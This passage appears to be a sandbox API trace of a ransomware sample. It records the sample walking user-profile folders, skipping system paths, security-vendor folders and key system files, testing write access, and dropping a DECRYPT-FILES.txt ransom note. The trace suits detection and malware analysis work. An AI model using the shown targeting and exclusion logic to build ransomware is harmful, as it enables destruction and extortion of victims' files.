lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0f50420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f50420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.702] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.702] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.702] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0f50420, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0f50420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f50420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.702] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.702] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88b51cb, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0186.702] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0186.702] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0186.702] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0186.702] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0186.702] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0186.702] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="DECRYPT-FILES.txt") returned 1 [0186.702] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="autorun.inf") returned 1 [0186.702] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="boot.ini") returned 1 [0186.702] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="desktop.ini") returned 1 [0186.702] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="ntuser.dat") returned -1 [0186.702] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="iconcache.db") returned -1 [0186.703] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="bootsect.bak") returned 1 [0186.703] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="ntuser.dat.log") returned -1 [0186.703] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="thumbs.db") returned -1 [0186.703] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="Bootfont.bin") returned 1 [0186.703] lstrlenW (lpString="Everywhere.search-ms") returned 20 [0186.703] lstrcmpiW (lpString1="search-ms", lpString2="lnk") returned 1 [0186.703] lstrcmpiW (lpString1="search-ms", lpString2="exe") returned 1 [0186.703] lstrcmpiW (lpString1="search-ms", lpString2="sys") returned -1 [0186.703] lstrcmpiW (lpString1="search-ms", lpString2="dll") returned 1 [0186.703] lstrlenW (lpString="C:\\Users\\Default\\Searches\\") returned 26 [0186.703] lstrlenW (lpString="Everywhere.search-ms") returned 20 [0186.703] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\Default\\Searches\\" | out: lpString1="C:\\Users\\Default\\Searches\\") returned="C:\\Users\\Default\\Searches\\" [0186.703] lstrcatW (in: lpString1="C:\\Users\\Default\\Searches\\", lpString2="Everywhere.search-ms" | out: lpString1="C:\\Users\\Default\\Searches\\Everywhere.search-ms") returned="C:\\Users\\Default\\Searches\\Everywhere.search-ms" [0186.703] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.703] CreateFileW (lpFileName="C:\\Users\\Default\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.704] CloseHandle (hObject=0x0) returned 0 [0186.704] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.704] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0186.704] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="DECRYPT-FILES.txt") returned 1 [0186.704] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="autorun.inf") returned 1 [0186.704] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="boot.ini") returned 1 [0186.704] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="desktop.ini") returned 1 [0186.704] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="ntuser.dat") returned -1 [0186.704] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="iconcache.db") returned 1 [0186.704] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="bootsect.bak") returned 1 [0186.704] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="ntuser.dat.log") returned -1 [0186.704] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="thumbs.db") returned -1 [0186.704] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="Bootfont.bin") returned 1 [0186.704] lstrlenW (lpString="Indexed Locations.search-ms") returned 27 [0186.704] lstrcmpiW (lpString1="search-ms", lpString2="lnk") returned 1 [0186.704] lstrcmpiW (lpString1="search-ms", lpString2="exe") returned 1 [0186.704] lstrcmpiW (lpString1="search-ms", lpString2="sys") returned -1 [0186.704] lstrcmpiW (lpString1="search-ms", lpString2="dll") returned 1 [0186.704] lstrlenW (lpString="C:\\Users\\Default\\Searches\\") returned 26 [0186.704] lstrlenW (lpString="Indexed Locations.search-ms") returned 27 [0186.705] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\Default\\Searches\\" | out: lpString1="C:\\Users\\Default\\Searches\\") returned="C:\\Users\\Default\\Searches\\" [0186.705] lstrcatW (in: lpString1="C:\\Users\\Default\\Searches\\", lpString2="Indexed Locations.search-ms" | out: lpString1="C:\\Users\\Default\\Searches\\Indexed Locations.search-ms") returned="C:\\Users\\Default\\Searches\\Indexed Locations.search-ms" [0186.705] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.705] CreateFileW (lpFileName="C:\\Users\\Default\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.705] CloseHandle (hObject=0x0) returned 0 [0186.705] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.705] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0186.705] FindClose (in: hFindFile=0x479878 | out: hFindFile=0x479878) returned 1 [0186.706] CloseHandle (hObject=0xffffffff) returned 0 [0186.706] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0186.706] lstrcmpW (lpString1="SendTo", lpString2=".") returned 1 [0186.706] lstrcmpW (lpString1="SendTo", lpString2="..") returned 1 [0186.706] lstrcatW (in: lpString1="SendTo", lpString2="\\" | out: lpString1="SendTo\\") returned="SendTo\\" [0186.706] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="SendTo\\" | out: lpString1="C:\\Users\\Default\\SendTo\\") returned="C:\\Users\\Default\\SendTo\\" [0186.706] StrStrW (lpFirst="C:\\Users\\Default\\SendTo\\", lpSrch="\\Program Files") returned 0x0 [0186.706] StrStrW (lpFirst="C:\\Users\\Default\\SendTo\\", lpSrch=":\\Windows") returned 0x0 [0186.706] StrStrW (lpFirst="C:\\Users\\Default\\SendTo\\", lpSrch="\\Games\\") returned 0x0 [0186.706] StrStrW (lpFirst="C:\\Users\\Default\\SendTo\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.706] StrStrW (lpFirst="C:\\Users\\Default\\SendTo\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.706] StrStrW (lpFirst="C:\\Users\\Default\\SendTo\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.706] StrStrW (lpFirst="C:\\Users\\Default\\SendTo\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.706] StrStrW (lpFirst="C:\\Users\\Default\\SendTo\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.706] StrStrW (lpFirst="C:\\Users\\Default\\SendTo\\", lpSrch="\\All Users") returned 0x0 [0186.706] StrStrW (lpFirst="C:\\Users\\Default\\SendTo\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.706] StrStrW (lpFirst="C:\\Users\\Default\\SendTo\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.706] StrStrW (lpFirst="C:\\Users\\Default\\SendTo\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.706] StrStrW (lpFirst="C:\\Users\\Default\\SendTo\\", lpSrch="AhnLab") returned 0x0 [0186.706] StrStrW (lpFirst="C:\\Users\\Default\\SendTo\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.706] lstrlenW (lpString="C:\\Users\\Default\\SendTo\\") returned 24 [0186.706] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.706] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\SendTo\\\\0a16c9.tmp") returned 35 [0186.706] CreateFileW (lpFileName="C:\\Users\\Default\\SendTo\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\sendto\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.712] GetLastError () returned 0x5 [0186.712] lstrlenW (lpString="C:\\Users\\Default\\SendTo\\") returned 24 [0186.712] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.712] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\SendTo\\\\DECRYPT-FILES.txt") returned 42 [0186.712] CreateFileW (lpFileName="C:\\Users\\Default\\SendTo\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\sendto\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.713] lstrlenW (lpString="C:\\Users\\Default\\SendTo\\") returned 24 [0186.713] lstrcatW (in: lpString1="C:\\Users\\Default\\SendTo\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\SendTo\\*") returned="C:\\Users\\Default\\SendTo\\*" [0186.713] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\SendTo\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="苟眔酯ͯ")) returned 0xffffffff [0186.713] CloseHandle (hObject=0xffffffff) returned 0 [0186.713] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0186.713] lstrcmpW (lpString1="Start Menu", lpString2=".") returned 1 [0186.713] lstrcmpW (lpString1="Start Menu", lpString2="..") returned 1 [0186.713] lstrcatW (in: lpString1="Start Menu", lpString2="\\" | out: lpString1="Start Menu\\") returned="Start Menu\\" [0186.713] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Start Menu\\" | out: lpString1="C:\\Users\\Default\\Start Menu\\") returned="C:\\Users\\Default\\Start Menu\\" [0186.714] StrStrW (lpFirst="C:\\Users\\Default\\Start Menu\\", lpSrch="\\Program Files") returned 0x0 [0186.714] StrStrW (lpFirst="C:\\Users\\Default\\Start Menu\\", lpSrch=":\\Windows") returned 0x0 [0186.714] StrStrW (lpFirst="C:\\Users\\Default\\Start Menu\\", lpSrch="\\Games\\") returned 0x0 [0186.714] StrStrW (lpFirst="C:\\Users\\Default\\Start Menu\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.714] StrStrW (lpFirst="C:\\Users\\Default\\Start Menu\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.714] StrStrW (lpFirst="C:\\Users\\Default\\Start Menu\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.714] StrStrW (lpFirst="C:\\Users\\Default\\Start Menu\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.714] StrStrW (lpFirst="C:\\Users\\Default\\Start Menu\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.714] StrStrW (lpFirst="C:\\Users\\Default\\Start Menu\\", lpSrch="\\All Users") returned 0x0 [0186.714] StrStrW (lpFirst="C:\\Users\\Default\\Start Menu\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.714] StrStrW (lpFirst="C:\\Users\\Default\\Start Menu\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.714] StrStrW (lpFirst="C:\\Users\\Default\\Start Menu\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.714] StrStrW (lpFirst="C:\\Users\\Default\\Start Menu\\", lpSrch="AhnLab") returned 0x0 [0186.714] StrStrW (lpFirst="C:\\Users\\Default\\Start Menu\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.714] lstrlenW (lpString="C:\\Users\\Default\\Start Menu\\") returned 28 [0186.714] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.714] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Start Menu\\\\0a16c9.tmp") returned 39 [0186.714] CreateFileW (lpFileName="C:\\Users\\Default\\Start Menu\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\start menu\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.714] GetLastError () returned 0x5 [0186.714] lstrlenW (lpString="C:\\Users\\Default\\Start Menu\\") returned 28 [0186.714] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.714] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Start Menu\\\\DECRYPT-FILES.txt") returned 46 [0186.714] CreateFileW (lpFileName="C:\\Users\\Default\\Start Menu\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\start menu\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.714] lstrlenW (lpString="C:\\Users\\Default\\Start Menu\\") returned 28 [0186.714] lstrcatW (in: lpString1="C:\\Users\\Default\\Start Menu\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Start Menu\\*") returned="C:\\Users\\Default\\Start Menu\\*" [0186.714] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Start Menu\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="苟眔酯ͯ")) returned 0xffffffff [0186.714] CloseHandle (hObject=0xffffffff) returned 0 [0186.715] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0186.715] lstrcmpW (lpString1="Templates", lpString2=".") returned 1 [0186.715] lstrcmpW (lpString1="Templates", lpString2="..") returned 1 [0186.715] lstrcatW (in: lpString1="Templates", lpString2="\\" | out: lpString1="Templates\\") returned="Templates\\" [0186.715] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Templates\\" | out: lpString1="C:\\Users\\Default\\Templates\\") returned="C:\\Users\\Default\\Templates\\" [0186.715] StrStrW (lpFirst="C:\\Users\\Default\\Templates\\", lpSrch="\\Program Files") returned 0x0 [0186.715] StrStrW (lpFirst="C:\\Users\\Default\\Templates\\", lpSrch=":\\Windows") returned 0x0 [0186.715] StrStrW (lpFirst="C:\\Users\\Default\\Templates\\", lpSrch="\\Games\\") returned 0x0 [0186.715] StrStrW (lpFirst="C:\\Users\\Default\\Templates\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.715] StrStrW (lpFirst="C:\\Users\\Default\\Templates\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.715] StrStrW (lpFirst="C:\\Users\\Default\\Templates\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.715] StrStrW (lpFirst="C:\\Users\\Default\\Templates\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.715] StrStrW (lpFirst="C:\\Users\\Default\\Templates\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.715] StrStrW (lpFirst="C:\\Users\\Default\\Templates\\", lpSrch="\\All Users") returned 0x0 [0186.715] StrStrW (lpFirst="C:\\Users\\Default\\Templates\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.715] StrStrW (lpFirst="C:\\Users\\Default\\Templates\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.715] StrStrW (lpFirst="C:\\Users\\Default\\Templates\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.715] StrStrW (lpFirst="C:\\Users\\Default\\Templates\\", lpSrch="AhnLab") returned 0x0 [0186.715] StrStrW (lpFirst="C:\\Users\\Default\\Templates\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.715] lstrlenW (lpString="C:\\Users\\Default\\Templates\\") returned 27 [0186.715] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.715] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Templates\\\\0a16c9.tmp") returned 38 [0186.715] CreateFileW (lpFileName="C:\\Users\\Default\\Templates\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\templates\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.715] GetLastError () returned 0x5 [0186.715] lstrlenW (lpString="C:\\Users\\Default\\Templates\\") returned 27 [0186.715] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.715] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Templates\\\\DECRYPT-FILES.txt") returned 45 [0186.715] CreateFileW (lpFileName="C:\\Users\\Default\\Templates\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\templates\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.715] lstrlenW (lpString="C:\\Users\\Default\\Templates\\") returned 27 [0186.716] lstrcatW (in: lpString1="C:\\Users\\Default\\Templates\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Templates\\*") returned="C:\\Users\\Default\\Templates\\*" [0186.716] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Templates\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="苟眔酯ͯ")) returned 0xffffffff [0186.716] CloseHandle (hObject=0xffffffff) returned 0 [0186.716] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0f76580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f76580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0186.716] lstrcmpW (lpString1="Videos", lpString2=".") returned 1 [0186.716] lstrcmpW (lpString1="Videos", lpString2="..") returned 1 [0186.716] lstrcatW (in: lpString1="Videos", lpString2="\\" | out: lpString1="Videos\\") returned="Videos\\" [0186.716] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Videos\\" | out: lpString1="C:\\Users\\Default\\Videos\\") returned="C:\\Users\\Default\\Videos\\" [0186.716] StrStrW (lpFirst="C:\\Users\\Default\\Videos\\", lpSrch="\\Program Files") returned 0x0 [0186.716] StrStrW (lpFirst="C:\\Users\\Default\\Videos\\", lpSrch=":\\Windows") returned 0x0 [0186.716] StrStrW (lpFirst="C:\\Users\\Default\\Videos\\", lpSrch="\\Games\\") returned 0x0 [0186.716] StrStrW (lpFirst="C:\\Users\\Default\\Videos\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.716] StrStrW (lpFirst="C:\\Users\\Default\\Videos\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.716] StrStrW (lpFirst="C:\\Users\\Default\\Videos\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.716] StrStrW (lpFirst="C:\\Users\\Default\\Videos\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.716] StrStrW (lpFirst="C:\\Users\\Default\\Videos\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.716] StrStrW (lpFirst="C:\\Users\\Default\\Videos\\", lpSrch="\\All Users") returned 0x0 [0186.716] StrStrW (lpFirst="C:\\Users\\Default\\Videos\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.716] StrStrW (lpFirst="C:\\Users\\Default\\Videos\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.716] StrStrW (lpFirst="C:\\Users\\Default\\Videos\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.716] StrStrW (lpFirst="C:\\Users\\Default\\Videos\\", lpSrch="AhnLab") returned 0x0 [0186.716] StrStrW (lpFirst="C:\\Users\\Default\\Videos\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.716] lstrlenW (lpString="C:\\Users\\Default\\Videos\\") returned 24 [0186.716] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.716] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Videos\\\\0a16c9.tmp") returned 35 [0186.716] CreateFileW (lpFileName="C:\\Users\\Default\\Videos\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\videos\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.716] GetLastError () returned 0x5 [0186.716] lstrlenW (lpString="C:\\Users\\Default\\Videos\\") returned 24 [0186.717] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.717] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Videos\\\\DECRYPT-FILES.txt") returned 42 [0186.717] CreateFileW (lpFileName="C:\\Users\\Default\\Videos\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\videos\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.717] lstrlenW (lpString="C:\\Users\\Default\\Videos\\") returned 24 [0186.717] lstrcatW (in: lpString1="C:\\Users\\Default\\Videos\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Videos\\*") returned="C:\\Users\\Default\\Videos\\*" [0186.717] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Videos\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, 